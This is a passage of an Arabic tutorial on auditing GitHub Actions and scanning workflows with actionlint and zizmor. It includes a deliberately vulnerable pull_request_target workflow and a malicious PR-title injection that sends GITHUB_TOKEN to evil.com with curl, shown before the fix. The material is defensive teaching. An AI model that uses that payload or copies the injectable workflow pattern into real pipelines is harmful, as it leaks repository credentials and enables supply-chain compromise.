\u062e\u0637\u0648\u0627\u062a)\u060c \u0623\u0648 <code>docker<\/code> (\u062a\u0634\u063a\u0644 \u062d\u0627\u0648\u064a\u0629)\u061f \u0644\u0643\u0644 \u0646\u0648\u0639 \u0645\u0644\u0641 \u0645\u062e\u0627\u0637\u0631 \u0645\u062e\u062a\u0644\u0641.<\/li>\n<li><strong>\u0627\u0644\u0645\u062f\u062e\u0644\u0627\u062a:<\/strong> \u0647\u0644 \u062a\u0642\u0628\u0644 \u0627\u0644\u0640 action \u0645\u062f\u062e\u0644\u0627\u062a \u062d\u0633\u0627\u0633\u0629 \u0645\u062b\u0644 \u0627\u0644\u0631\u0645\u0648\u0632 \u0627\u0644\u0645\u0645\u064a\u0632\u0629 \u0623\u0648 \u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0627\u0639\u062a\u0645\u0627\u062f\u061f<\/li>\n<li><strong>\u0627\u0644\u0625\u062c\u0631\u0627\u0621 \u0627\u0644\u0644\u0627\u062d\u0642:<\/strong> \u0647\u0644 \u062a\u062d\u062f\u062f \u0646\u0642\u0637\u0629 \u062f\u062e\u0648\u0644 <code>post:<\/code>\u061f 
\u0627\u0644\u0625\u062c\u0631\u0627\u0621\u0627\u062a \u0627\u0644\u0644\u0627\u062d\u0642\u0629 \u062a\u0639\u0645\u0644 \u062d\u062a\u0649 \u0644\u0648 \u0641\u0634\u0644\u062a \u0627\u0644\u0648\u0638\u064a\u0641\u0629\u060c \u0645\u0645\u0627 \u064a\u062c\u0639\u0644\u0647\u0627 \u0645\u062b\u0627\u0644\u064a\u0629 \u0644\u0644\u062a\u0633\u0631\u064a\u0628.<\/li>\n<\/ul>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 3: \u0641\u062d\u0635 \u0627\u0644\u0634\u064a\u0641\u0631\u0629 \u0627\u0644\u0645\u0635\u062f\u0631\u064a\u0629<\/h3>\n<p>\u0644\u0644\u0640 actions \u0627\u0644\u0645\u0628\u0646\u064a\u0629 \u0639\u0644\u0649 JavaScript\/TypeScript\u060c \u0627\u0641\u062d\u0635 \u0645\u0644\u0641 <code>dist\/index.js<\/code> \u0627\u0644\u0645\u064f\u062c\u0645\u0651\u0639 \u0648\u0627\u0644\u0645\u0635\u062f\u0631 \u0641\u064a <code>src\/<\/code>:<\/p>\n<pre><code># \u0627\u0644\u0628\u062d\u062b \u0639\u0646 \u0627\u0633\u062a\u062f\u0639\u0627\u0621\u0627\u062a \u0627\u0644\u0634\u0628\u0643\u0629\ngrep -rn 'https\\?:\/\/' \/tmp\/audit-checkout\/src\/ | grep -v 'github.com\\|api.github.com'\n\n# \u0627\u0644\u0628\u062d\u062b \u0639\u0646 \u0623\u0646\u0645\u0627\u0637 \u0627\u0644\u0648\u0635\u0648\u0644 \u0644\u0644\u0623\u0633\u0631\u0627\u0631\ngrep -rn 'GITHUB_TOKEN\\|process.env\\|getInput' \/tmp\/audit-checkout\/src\/\n\n# \u0627\u0644\u0628\u062d\u062b \u0639\u0646 \u0643\u062a\u0627\u0628\u0629 \u0627\u0644\u0645\u0644\u0641\u0627\u062a \u0641\u064a \u0645\u0648\u0627\u0642\u0639 \u062d\u0633\u0627\u0633\u0629\ngrep -rn 'GITHUB_ENV\\|GITHUB_OUTPUT\\|GITHUB_PATH' \/tmp\/audit-checkout\/src\/\n\n# \u0627\u0644\u0628\u062d\u062b \u0639\u0646 \u0627\u0633\u062a\u062f\u0639\u0627\u0621\u0627\u062a exec \u0623\u0648 spawn\ngrep -rn 'exec\\|spawn\\|child_process' \/tmp\/audit-checkout\/src\/<\/code><\/pre>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 4: \u0642\u0627\u0626\u0645\u0629 \u0641\u062d\u0635 \u0627\u0644\u0639\u0644\u0627\u0645\u0627\u062a 
\u0627\u0644\u062d\u0645\u0631\u0627\u0621<\/h3>\n<p>\u0627\u0633\u062a\u062e\u062f\u0645 \u0642\u0627\u0626\u0645\u0629 \u0627\u0644\u0641\u062d\u0635 \u0647\u0630\u0647 \u0639\u0646\u062f \u062a\u062f\u0642\u064a\u0642 \u0623\u064a GitHub Action:<\/p>\n<table>\n<thead>\n<tr>\n<th>\u0627\u0644\u0639\u0644\u0627\u0645\u0629 \u0627\u0644\u062d\u0645\u0631\u0627\u0621<\/th>\n<th>\u0645\u0627 \u0627\u0644\u0630\u064a \u062a\u0628\u062d\u062b \u0639\u0646\u0647<\/th>\n<th>\u0645\u0633\u062a\u0648\u0649 \u0627\u0644\u062e\u0637\u0631<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>\u0627\u0633\u062a\u062f\u0639\u0627\u0621\u0627\u062a \u0634\u0628\u0643\u0629 \u0644\u0646\u0637\u0627\u0642\u0627\u062a \u0645\u062c\u0647\u0648\u0644\u0629<\/td>\n<td><code>fetch()<\/code>\u060c <code>http.request()<\/code>\u060c <code>curl<\/code> \u0644\u0646\u0637\u0627\u0642\u0627\u062a \u063a\u064a\u0631 GitHub<\/td>\n<td>\u062d\u0631\u062c<\/td>\n<\/tr>\n<tr>\n<td>\u0627\u0644\u0648\u0635\u0648\u0644 \u0644\u0644\u0623\u0633\u0631\u0627\u0631<\/td>\n<td>\u0642\u0631\u0627\u0621\u0629 <code>GITHUB_TOKEN<\/code>\u060c <code>secrets.*<\/code>\u060c \u0623\u0648 \u0645\u062a\u063a\u064a\u0631\u0627\u062a \u0627\u0644\u0628\u064a\u0626\u0629<\/td>\n<td>\u0639\u0627\u0644\u064a<\/td>\n<\/tr>\n<tr>\n<td>\u0627\u0644\u062a\u0644\u0627\u0639\u0628 \u0628\u0627\u0644\u0628\u064a\u0626\u0629<\/td>\n<td>\u0627\u0644\u0643\u062a\u0627\u0628\u0629 \u0641\u064a <code>GITHUB_ENV<\/code>\u060c <code>GITHUB_OUTPUT<\/code>\u060c \u0623\u0648 <code>GITHUB_PATH<\/code><\/td>\n<td>\u0639\u0627\u0644\u064a<\/td>\n<\/tr>\n<tr>\n<td>\u062a\u0646\u0641\u064a\u0630 \u0634\u064a\u0641\u0631\u0629 \u062f\u064a\u0646\u0627\u0645\u064a\u0643\u064a\u0629<\/td>\n<td><code>eval()<\/code>\u060c <code>exec()<\/code>\u060c \u062a\u0646\u0632\u064a\u0644 \u0648\u062a\u0634\u063a\u064a\u0644 \u0633\u0643\u0631\u064a\u0628\u062a\u0627\u062a<\/td>\n<td>\u062d\u0631\u062c<\/td>\n<\/tr>\n<tr>\n<td>\u0634\u064a\u0641\u0631\u0629 
\u0645\u0628\u0647\u0645\u0629<\/td>\n<td>\u0633\u0644\u0627\u0633\u0644 \u0645\u0634\u0641\u0631\u0629 \u0628\u0640 Base64\u060c \u0634\u064a\u0641\u0631\u0629 \u0645\u0635\u063a\u0631\u0629 \u0628\u062f\u0648\u0646 \u062e\u0631\u0627\u0626\u0637 \u0645\u0635\u062f\u0631<\/td>\n<td>\u0639\u0627\u0644\u064a<\/td>\n<\/tr>\n<tr>\n<td>\u062e\u0637\u0627\u0641\u0627\u062a \u0627\u0644\u0625\u062c\u0631\u0627\u0621 \u0627\u0644\u0644\u0627\u062d\u0642<\/td>\n<td>\u0646\u0642\u0637\u0629 \u062f\u062e\u0648\u0644 <code>post:<\/code> \u0641\u064a <code>action.yml<\/code><\/td>\n<td>\u0645\u062a\u0648\u0633\u0637<\/td>\n<\/tr>\n<tr>\n<td>\u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0645\u0641\u0631\u0637\u0629 \u0645\u0637\u0644\u0648\u0628\u0629<\/td>\n<td>\u0627\u0644\u062a\u0648\u062b\u064a\u0642 \u064a\u0637\u0644\u0628 \u0635\u0644\u0627\u062d\u064a\u0627\u062a <code>write<\/code> \u0623\u0643\u062b\u0631 \u0645\u0645\u0627 \u0647\u0648 \u0645\u0637\u0644\u0648\u0628<\/td>\n<td>\u0645\u062a\u0648\u0633\u0637<\/td>\n<\/tr>\n<tr>\n<td>\u0644\u0627 \u062a\u062d\u0642\u0642 \u0623\u0648 \u062a\u0648\u0642\u064a\u0639<\/td>\n<td>\u0627\u0644\u0640 action \u0644\u064a\u0633\u062a \u0645\u0646 \u0645\u0646\u0634\u0626 \u0645\u0648\u062b\u0642\u060c \u0644\u0627 \u062a\u0648\u0642\u064a\u0639\u0627\u062a Sigstore<\/td>\n<td>\u0645\u0646\u062e\u0641\u0636-\u0645\u062a\u0648\u0633\u0637<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 5: \u0645\u062b\u0627\u0644 \u0639\u0644\u0649 \u0627\u0644\u062a\u062f\u0642\u064a\u0642 \u2014 <code>actions\/checkout@v4<\/code><\/h3>\n<p>\u0625\u0644\u064a\u0643 \u062a\u062f\u0642\u064a\u0642\u064b\u0627 \u0645\u062e\u062a\u0635\u0631\u064b\u0627 \u0644\u0640 <code>actions\/checkout@v4<\/code>:<\/p>\n<pre><code># \u062a\u062d\u0644\u064a\u0644 action.yml\n# - \u0627\u0644\u0646\u0648\u0639: node20 (action \u0628\u0644\u063a\u0629 JavaScript)\n# - \u0627\u0644\u0645\u062f\u062e\u0644\u0627\u062a: 
\u064a\u0642\u0628\u0644 \u0645\u062f\u062e\u0644 'token' (\u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a github.token)\n# - \u0627\u0644\u0625\u062c\u0631\u0627\u0621 \u0627\u0644\u0644\u0627\u062d\u0642: \u0646\u0639\u0645 \u2014 \u064a\u0634\u063a\u0644 \u062a\u0646\u0638\u064a\u0641 \u0644\u0625\u0632\u0627\u0644\u0629 \u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0627\u0639\u062a\u0645\u0627\u062f\n\n# \u062a\u062d\u0644\u064a\u0644 \u0627\u0644\u0634\u0628\u0643\u0629\n# - \u064a\u062a\u0635\u0644 \u0628\u0640: api.github.com (\u0645\u062a\u0648\u0642\u0639 \u0644\u0639\u0645\u0644\u064a\u0627\u062a git)\n# - \u0644\u0627 \u0627\u062a\u0635\u0627\u0644\u0627\u062a \u0628\u0646\u0637\u0627\u0642\u0627\u062a \u0623\u0637\u0631\u0627\u0641 \u062b\u0627\u0644\u062b\u0629 \u2713\n\n# \u0627\u0644\u062a\u0639\u0627\u0645\u0644 \u0645\u0639 \u0627\u0644\u0623\u0633\u0631\u0627\u0631\n# - \u064a\u0633\u062a\u062e\u062f\u0645 GITHUB_TOKEN \u0644\u0627\u0633\u062a\u0646\u0633\u0627\u062e git \u0627\u0644\u0645\u0635\u0627\u062f\u0642 \u0639\u0644\u064a\u0647\n# - \u064a\u062a\u0645 \u062d\u0641\u0638 \u0627\u0644\u0631\u0645\u0632 \u0641\u064a \u062a\u0643\u0648\u064a\u0646 git \u0627\u0641\u062a\u0631\u0627\u0636\u064a\u064b\u0627 (\u0645\u062f\u062e\u0644 persist-credentials)\n# - \u0627\u0644\u0625\u062c\u0631\u0627\u0621 \u0627\u0644\u0644\u0627\u062d\u0642 \u064a\u0632\u064a\u0644 \u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0627\u0639\u062a\u0645\u0627\u062f \u0627\u0644\u0645\u062d\u0641\u0648\u0638\u0629\n\n# \u0643\u062a\u0627\u0628\u0629 \u0627\u0644\u0628\u064a\u0626\u0629\n# - \u0644\u0627 \u064a\u0643\u062a\u0628 \u0641\u064a GITHUB_ENV \u0623\u0648 GITHUB_PATH \u2713\n\n# \u0627\u0644\u062d\u0643\u0645: \u0622\u0645\u0646 \u2014 \u0627\u0644\u0633\u0644\u0648\u0643 \u064a\u0637\u0627\u0628\u0642 \u0627\u0644\u063a\u0631\u0636 \u0627\u0644\u0645\u0648\u062b\u0642\n# \u0627\u0644\u062a\u0648\u0635\u064a\u0629: \u0627\u0636\u0628\u0637 
persist-credentials: false \u0644\u062a\u0642\u0644\u064a\u0644 \u062a\u0639\u0631\u0636 \u0627\u0644\u0631\u0645\u0632<\/code><\/pre>\n<p>\u0637\u0628\u0651\u0642 \u0646\u0641\u0633 \u0627\u0644\u0639\u0645\u0644\u064a\u0629 \u0639\u0644\u0649 \u0643\u0644 action \u062c\u062f\u064a\u062f\u0629 \u0642\u0628\u0644 \u0625\u0636\u0627\u0641\u062a\u0647\u0627 \u0625\u0644\u0649 \u0645\u0633\u0627\u0631\u0627\u062a \u0639\u0645\u0644\u0643.<\/p>\n<h2>\u0627\u0644\u062a\u0645\u0631\u064a\u0646 2: \u0641\u062d\u0635 \u0627\u0644\u0640 Actions \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 actionlint<\/h2>\n<p><a href=\"https:\/\/github.com\/rhysd\/actionlint\" target=\"_blank\" rel=\"noopener\">actionlint<\/a> \u0647\u0648 \u0623\u062f\u0627\u0629 \u062a\u062d\u0644\u064a\u0644 \u062b\u0627\u0628\u062a \u0644\u0645\u0644\u0641\u0627\u062a \u0645\u0633\u0627\u0631\u0627\u062a \u0639\u0645\u0644 GitHub Actions. \u064a\u0643\u062a\u0634\u0641 \u0623\u062e\u0637\u0627\u0621 \u0627\u0644\u0635\u064a\u0627\u063a\u0629\u060c \u0648\u0639\u062f\u0645 \u062a\u0637\u0627\u0628\u0642 \u0627\u0644\u0623\u0646\u0648\u0627\u0639\u060c \u0648\u0627\u0644\u0623\u0647\u0645 \u0644\u0623\u063a\u0631\u0627\u0636\u0646\u0627 \u2014 \u062b\u063a\u0631\u0627\u062a \u062d\u0642\u0646 \u0627\u0644\u062a\u0639\u0628\u064a\u0631\u0627\u062a.<\/p>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 1: \u062a\u062b\u0628\u064a\u062a actionlint<\/h3>\n<pre><code># macOS\nbrew install actionlint\n\n# Linux (\u062a\u0646\u0632\u064a\u0644 \u0627\u0644\u0645\u0644\u0641 \u0627\u0644\u062a\u0646\u0641\u064a\u0630\u064a)\ncurl -sL https:\/\/github.com\/rhysd\/actionlint\/releases\/latest\/download\/actionlint_linux_amd64.tar.gz | tar xz\nsudo mv actionlint \/usr\/local\/bin\/\n\n# \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0627\u0644\u062a\u062b\u0628\u064a\u062a\nactionlint --version<\/code><\/pre>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 2: \u0627\u0644\u062a\u0634\u063a\u064a\u0644 \u0639\u0644\u0649 
\u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644<\/h3>\n<pre><code>actionlint .github\/workflows\/*.yml<\/code><\/pre>\n<p>\u0644\u0645\u0633\u0627\u0631 \u0639\u0645\u0644 CI \u0627\u0644\u0646\u0645\u0648\u0630\u062c\u064a \u0644\u062f\u064a\u0646\u0627\u060c \u0633\u064a\u0646\u062a\u062c actionlint \u0645\u062e\u0631\u062c\u0627\u062a \u0646\u0638\u064a\u0641\u0629 \u0644\u0623\u0646\u0646\u0627 \u0627\u062a\u0628\u0639\u0646\u0627 \u0627\u0644\u0645\u0645\u0627\u0631\u0633\u0627\u062a \u0627\u0644\u062c\u064a\u062f\u0629. \u062f\u0639\u0646\u0627 \u0646\u0646\u0634\u0626 \u0645\u0633\u0627\u0631 \u0639\u0645\u0644 \u0636\u0639\u064a\u0641 \u0644\u0646\u0631\u0649 \u0642\u062f\u0631\u0627\u062a \u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u0623\u0645\u0627\u0646 \u0641\u064a actionlint.<\/p>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 3: \u0625\u0646\u0634\u0627\u0621 \u0645\u0633\u0627\u0631 \u0639\u0645\u0644 \u0636\u0639\u064a\u0641<\/h3>\n<p>\u0623\u0646\u0634\u0626 <code>.github\/workflows\/greet-pr.yml<\/code> \u0645\u0639 \u062b\u063a\u0631\u0627\u062a \u0645\u062a\u0639\u0645\u062f\u0629:<\/p>\n<pre><code>name: Greet PR\non:\n  pull_request_target:\n    types: [opened]\n\njobs:\n  greet:\n    runs-on: ubuntu-latest\n    permissions:\n      pull-requests: write\n    steps:\n      - name: Greet the contributor\n        run: |\n          echo \"PR Title: ${{ github.event.pull_request.title }}\"\n          echo \"PR Author: ${{ github.event.pull_request.user.login }}\"\n          echo \"PR Body: ${{ github.event.pull_request.body }}\"\n        env:\n          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}\n\n      - name: Post comment\n        run: |\n          curl -X POST \\\n            -H \"Authorization: token $GITHUB_TOKEN\" \\\n            -H \"Accept: application\/vnd.github.v3+json\" \\\n            https:\/\/api.github.com\/repos\/${{ github.repository }}\/issues\/${{ github.event.pull_request.number }}\/comments \\\n            
-d '{\"body\": \"Welcome, ${{ github.event.pull_request.user.login }}! Thanks for your PR: ${{ github.event.pull_request.title }}\"}'<\/code><\/pre>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 4: \u0641\u062d\u0635 \u0645\u0633\u0627\u0631 \u0627\u0644\u0639\u0645\u0644 \u0627\u0644\u0636\u0639\u064a\u0641<\/h3>\n<pre><code>actionlint .github\/workflows\/greet-pr.yml<\/code><\/pre>\n<p>\u0633\u064a\u064f\u0628\u0644\u0651\u063a actionlint \u0639\u0646 \u062b\u063a\u0631\u0627\u062a \u062d\u0642\u0646 \u0627\u0644\u062a\u0639\u0628\u064a\u0631\u0627\u062a:<\/p>\n<pre><code>.github\/workflows\/greet-pr.yml:14:27: expression injection: \n  \"github.event.pull_request.title\" is potentially untrusted. \n  Consider using an environment variable instead. \n  [expression]\n.github\/workflows\/greet-pr.yml:16:25: expression injection: \n  \"github.event.pull_request.body\" is potentially untrusted. \n  Consider using an environment variable instead. \n  [expression]<\/code><\/pre>\n<p>\u062d\u0642\u0648\u0644 <code>title<\/code> \u0648<code>body<\/code> \u064a\u062a\u062d\u0643\u0645 \u0628\u0647\u0627 \u0643\u0627\u062a\u0628 \u0627\u0644\u0640 PR. 
\u064a\u0645\u0643\u0646 \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0635\u064a\u0627\u063a\u0629 \u0639\u0646\u0648\u0627\u0646 PR \u064a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u0645\u062d\u0627\u0631\u0641 \u062e\u0627\u0635\u0629 \u0628\u0627\u0644\u0635\u062f\u0641\u0629 \u0644\u062a\u0646\u0641\u064a\u0630 \u0623\u0648\u0627\u0645\u0631 \u0639\u0634\u0648\u0627\u0626\u064a\u0629:<\/p>\n<pre><code># \u0639\u0646\u0648\u0627\u0646 PR \u062e\u0628\u064a\u062b:\nInnocent Title\"; curl -s https:\/\/evil.com\/steal?token=$GITHUB_TOKEN; echo \"<\/code><\/pre>\n<p>\u0639\u0646\u062f\u0645\u0627 \u064a\u062a\u0645 \u0627\u0633\u062a\u0643\u0645\u0627\u0644 \u0647\u0630\u0627 \u0627\u0644\u0639\u0646\u0648\u0627\u0646 \u0645\u0628\u0627\u0634\u0631\u0629 \u0641\u064a \u0643\u062a\u0644\u0629 <code>run:<\/code> \u0639\u0628\u0631 <code>${{ }}<\/code>\u060c \u062a\u0646\u0641\u0630 \u0627\u0644\u0635\u062f\u0641\u0629 \u0627\u0644\u0623\u0645\u0631 \u0627\u0644\u0645\u062d\u0642\u0648\u0646.<\/p>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 5: \u0625\u0635\u0644\u0627\u062d \u0627\u0644\u062b\u063a\u0631\u0629<\/h3>\n<p>\u0627\u0644\u0625\u0635\u0644\u0627\u062d \u0647\u0648 \u062a\u0645\u0631\u064a\u0631 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u063a\u064a\u0631 \u0627\u0644\u0645\u0648\u062b\u0648\u0642\u0629 \u0645\u0646 \u062e\u0644\u0627\u0644 \u0645\u062a\u063a\u064a\u0631\u0627\u062a \u0627\u0644\u0628\u064a\u0626\u0629 \u0628\u062f\u0644\u0627\u064b \u0645\u0646 \u0627\u0644\u0627\u0633\u062a\u0643\u0645\u0627\u0644 \u0627\u0644\u0645\u0628\u0627\u0634\u0631:<\/p>\n<pre><code>name: Greet PR (Fixed)\non:\n  pull_request_target:\n    types: [opened]\n\njobs:\n  greet:\n    runs-on: ubuntu-latest\n    permissions:\n      pull-requests: write\n    steps:\n      - name: Greet the contributor\n        run: |\n          echo \"PR Title: $PR_TITLE\"\n          echo \"PR Author: $PR_AUTHOR\"\n          echo \"PR Body: $PR_BODY\"\n        env:\n          
PR_TITLE: ${{ github.event.pull_request.title }}\n          PR_AUTHOR: ${{ github.event.pull_request.user.login }}\n          PR_BODY: ${{ github.event.pull_request.body }}\n          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}\n\n      - name: Post comment\n        uses: actions\/github-script@v7\n        with:\n          script: |\n            await github.rest.issues.createComment({\n              owner: context.repo.owner,\n              repo: context.repo.repo,\n              issue_number: context.payload.pull_request.number,\n              body: `Welcome, ${context.payload.pull_request.user.login}! Thanks for your PR.`\n            });<\/code><\/pre>\n<p>\u0645\u062a\u063a\u064a\u0631\u0627\u062a \u0627\u0644\u0628\u064a\u0626\u0629 \u062a\u064f\u0645\u0631\u0631 \u0643\u0628\u064a\u0627\u0646\u0627\u062a\u060c \u0648\u0644\u0627 \u064a\u062a\u0645 \u0627\u0633\u062a\u0643\u0645\u0627\u0644\u0647\u0627 \u0641\u064a \u0623\u0648\u0627\u0645\u0631 \u0627\u0644\u0635\u062f\u0641\u0629\u060c \u0645\u0645\u0627 \u064a\u0645\u0646\u0639 \u0627\u0644\u062d\u0642\u0646. \u0623\u0639\u062f \u062a\u0634\u063a\u064a\u0644 actionlint \u0644\u0644\u062a\u0623\u0643\u062f \u0645\u0646 \u0627\u0644\u0625\u0635\u0644\u0627\u062d:<\/p>\n<pre><code>actionlint .github\/workflows\/greet-pr-fixed.yml\n# \u0644\u0627 \u0645\u062e\u0631\u062c\u0627\u062a = \u0644\u0627 \u0645\u0634\u0627\u0643\u0644<\/code><\/pre>\n<h2>\u0627\u0644\u062a\u0645\u0631\u064a\u0646 3: \u0627\u0644\u0641\u062d\u0635 \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 zizmor<\/h2>\n<p><a href=\"https:\/\/github.com\/woodruffw\/zizmor\" target=\"_blank\" rel=\"noopener\">zizmor<\/a> \u0647\u0648 \u0623\u062f\u0627\u0629 \u062a\u062d\u0644\u064a\u0644 \u062b\u0627\u0628\u062a \u062a\u0631\u0643\u0632 \u0639\u0644\u0649 \u0627\u0644\u0623\u0645\u0627\u0646 \u0648\u0645\u0635\u0645\u0645\u0629 \u062e\u0635\u064a\u0635\u064b\u0627 \u0644\u0640 GitHub Actions. 
\u0628\u064a\u0646\u0645\u0627 \u064a\u0631\u0643\u0632 actionlint \u0639\u0644\u0649 \u0627\u0644\u0635\u062d\u0629 \u0645\u0639 \u0628\u0639\u0636 \u0641\u062d\u0648\u0635\u0627\u062a \u0627\u0644\u0623\u0645\u0627\u0646\u060c \u064a\u0631\u0643\u0632 zizmor \u062d\u0635\u0631\u064a\u064b\u0627 \u0639\u0644\u0649 \u0627\u0644\u0623\u0646\u0645\u0627\u0637 \u0627\u0644\u0645\u0636\u0627\u062f\u0629 \u0644\u0644\u0623\u0645\u0627\u0646.<\/p>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 1: \u062a\u062b\u0628\u064a\u062a zizmor<\/h3>\n<pre><code># \u0627\u0644\u062a\u062b\u0628\u064a\u062a \u0639\u0628\u0631 pip\npip install zizmor\n\n# \u0623\u0648 \u0639\u0628\u0631 pipx \u0644\u0644\u0639\u0632\u0644\npipx install zizmor\n\n# \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0627\u0644\u062a\u062b\u0628\u064a\u062a\nzizmor --version<\/code><\/pre>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 2: \u0627\u0644\u062a\u0634\u063a\u064a\u0644 \u0639\u0644\u0649 \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644<\/h3>\n<pre><code>zizmor .github\/workflows\/<\/code><\/pre>\n<p>\u064a\u062d\u0644\u0644 zizmor \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644 \u0644\u0645\u062c\u0645\u0648\u0639\u0629 \u0634\u0627\u0645\u0644\u0629 \u0645\u0646 \u0627\u0644\u0645\u0634\u0627\u0643\u0644 \u0627\u0644\u0623\u0645\u0646\u064a\u0629. 
\u0639\u0644\u0649 \u0645\u0644\u0641 <code>ci.yml<\/code> \u0627\u0644\u0646\u0645\u0648\u0630\u062c\u064a \u0644\u062f\u064a\u0646\u0627\u060c \u0633\u064a\u064f\u0628\u0644\u0651\u063a \u0639\u0646:<\/p>\n<pre><code>ci.yml:15:9 warning[unpinned-uses]: unpinned 3rd-party action reference\n  |\n15|       - uses: actions\/checkout@v4\n  |         ^^^^ action not pinned to a full-length commit SHA\n  |\n  = note: Pinning actions to a full SHA protects against tag mutation attacks\n\nci.yml:17:9 warning[unpinned-uses]: unpinned 3rd-party action reference\n  |\n17|       - uses: actions\/setup-node@v4\n  |         ^^^^ action not pinned to a full-length commit SHA\n\nci.yml:20:9 warning[unpinned-uses]: unpinned 3rd-party action reference\n  |\n20|       - uses: actions\/cache@v4\n  |         ^^^^ action not pinned to a full-length commit SHA<\/code><\/pre>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 3: \u0641\u062d\u0635 \u0645\u0633\u0627\u0631 \u0627\u0644\u0639\u0645\u0644 \u0627\u0644\u0636\u0639\u064a\u0641<\/h3>\n<pre><code>zizmor .github\/workflows\/greet-pr.yml<\/code><\/pre>\n<p>\u0633\u064a\u0646\u062a\u062c zizmor \u0646\u062a\u0627\u0626\u062c \u0623\u0645\u0646\u064a\u0629 \u0623\u063a\u0646\u0649:<\/p>\n<pre><code>greet-pr.yml:4:5 warning[dangerous-trigger]: use of dangerous trigger\n  |\n4 |   pull_request_target:\n  |   ^^^^^^^^^^^^^^^^^^^^ pull_request_target runs in the context of the base branch\n  |\n  = note: This trigger has access to repository secrets and a read-write token\n\ngreet-pr.yml:14:27 error[template-injection]: template injection in run: block\n  |\n14|          echo \"PR Title: ${{ github.event.pull_request.title }}\"\n  |                          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  |\n  = note: Attacker-controlled input is interpolated directly into a shell command\n\ngreet-pr.yml:15:9 warning[unpinned-uses]: no actions pinned by SHA\n  |\n  = note: All third-party actions should be pinned to full commit 
SHAs\n\ngreet-pr.yml:12:5 warning[excessive-permissions]: permissions may be overly broad\n  |\n  = note: Consider using read-only permissions where possible<\/code><\/pre>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 4: \u0645\u0642\u0627\u0631\u0646\u0629 actionlint \u0648zizmor<\/h3>\n<table>\n<thead>\n<tr>\n<th>\u0627\u0644\u0645\u064a\u0632\u0629<\/th>\n<th>actionlint<\/th>\n<th>zizmor<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>\u0627\u0644\u062a\u0631\u0643\u064a\u0632 \u0627\u0644\u0623\u0633\u0627\u0633\u064a<\/td>\n<td>\u0627\u0644\u0635\u062d\u0629 \u0648\u0627\u0644\u0635\u064a\u0627\u063a\u0629<\/td>\n<td>\u0627\u0644\u062a\u062d\u0644\u064a\u0644 \u0627\u0644\u0623\u0645\u0646\u064a<\/td>\n<\/tr>\n<tr>\n<td>\u062d\u0642\u0646 \u0627\u0644\u062a\u0639\u0628\u064a\u0631\u0627\u062a<\/td>\n<td>\u0646\u0639\u0645<\/td>\n<td>\u0646\u0639\u0645 (\u0623\u0643\u062b\u0631 \u0634\u0645\u0648\u0644\u0627\u064b)<\/td>\n<\/tr>\n<tr>\n<td>actions \u063a\u064a\u0631 \u0645\u062b\u0628\u062a\u0629<\/td>\n<td>\u0644\u0627<\/td>\n<td>\u0646\u0639\u0645<\/td>\n<\/tr>\n<tr>\n<td>\u0627\u0644\u0645\u064f\u062d\u0641\u0651\u0632\u0627\u062a \u0627\u0644\u062e\u0637\u0631\u0629<\/td>\n<td>\u0644\u0627<\/td>\n<td>\u0646\u0639\u0645<\/td>\n<\/tr>\n<tr>\n<td>\u0627\u0644\u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0627\u0644\u0645\u0641\u0631\u0637\u0629<\/td>\n<td>\u0644\u0627<\/td>\n<td>\u0646\u0639\u0645<\/td>\n<\/tr>\n<tr>\n<td>\u062a\u0633\u0645\u064a\u0645 \u0627\u0644\u0645\u062e\u0631\u062c\u0627\u062a<\/td>\n<td>\u0644\u0627<\/td>\n<td>\u0646\u0639\u0645<\/td>\n<\/tr>\n<tr>\n<td>\u062e\u0637\u0623 \u062a\u0643\u0648\u064a\u0646 OIDC<\/td>\n<td>\u0644\u0627<\/td>\n<td>\u0646\u0639\u0645<\/td>\n<\/tr>\n<tr>\n<td>\u0641\u062d\u0635 \u0627\u0644\u0623\u0646\u0648\u0627\u0639<\/td>\n<td>\u0646\u0639\u0645<\/td>\n<td>\u0644\u0627<\/td>\n<\/tr>\n<tr>\n<td>\u0627\u0644\u0635\u064a\u0627\u063a\u0629 
